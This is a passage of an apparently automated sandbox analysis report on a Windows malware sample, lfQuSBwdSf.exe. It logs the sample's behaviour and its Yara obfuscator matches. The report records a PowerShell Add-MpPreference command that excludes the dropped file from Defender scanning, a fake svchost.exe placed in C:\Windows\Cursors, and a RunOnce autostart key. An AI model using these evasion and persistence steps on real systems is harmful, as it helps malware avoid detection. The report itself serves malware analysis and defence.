                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe Process created: unknown unknown
                      Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: lfQuSBwdSf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: lfQuSBwdSf.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbOS source: lfQuSBwdSf.exe, 00000000.00000002.341939107.00000000013F2000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbs source: lfQuSBwdSf.exe, 00000000.00000002.341939107.00000000013F2000.00000004.00000020.sdmp
                      Source: Binary string: npAjVisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbs source: lfQuSBwdSf.exe, 00000000.00000002.341262404.00000000013C2000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: lfQuSBwdSf.exe, 00000000.00000002.340683009.0000000001392000.00000004.00000020.sdmp
                      Source: Binary string: (P6jLC:\Windows\Microsoft.VisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: lfQuSBwdSf.PDB source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb, source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: lfQuSBwdSf.exe, 00000000.00000002.341262404.00000000013C2000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\lfQuSBwdSf.PDB source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb1G source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: C:\Users\user\Desktop\lfQuSBwdSf.PDB source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.341262404.00000000013C2000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdby source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: .pdb%H source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp

                      Data Obfuscation:

                      Yara detected Beds Obfuscator
                      Source: Yara match File source: 00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000011.00000002.517681508.0000000004965000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 23.2.svchost.exe.4a72390.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 23.2.svchost.exe.4ad53b0.6.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 23.2.svchost.exe.4ad53b0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 17.2.svchost.exe.49c8f18.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 17.2.svchost.exe.4965ef8.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 21.2.lfQuSBwdSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 17.2.svchost.exe.4965ef8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 23.2.svchost.exe.4a72390.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 17.2.svchost.exe.49c8f18.2.raw.unpack, type: UNPACKEDPE
                      Source: lfQuSBwdSf.exe Static PE information: 0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                      Source: svchost.exe.0.dr Static PE information: real checksum: 0xc0d7 should be: 0xc7cf
                      Source: lfQuSBwdSf.exe Static PE information: real checksum: 0xc0d7 should be: 0xc7cf
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07951752 pushad ; ret
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07952542 push esp; retf
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07951488 push eax; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_0801D831 push eax; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_08017A29 push eax; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_080116FA push eax; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_07876EE8 pushad ; retf
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_07877320 push esp; retf
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_078B12F8 push eax; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_078B7A28 push eax; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_078C2B0F push eax; mov dword ptr [esp], edx

                      Persistence and Installation Behavior:

                      Drops PE files with benign system names
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe File created: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe
                      Drops executables to the windows directory (C:\Windows) and starts them
                      Source: unknown Executable created and started: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe File created: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe

                      Boot Survival:

                      Creates an autostart registry key pointing to binary in C:\Windows
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce wyreCRIln
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
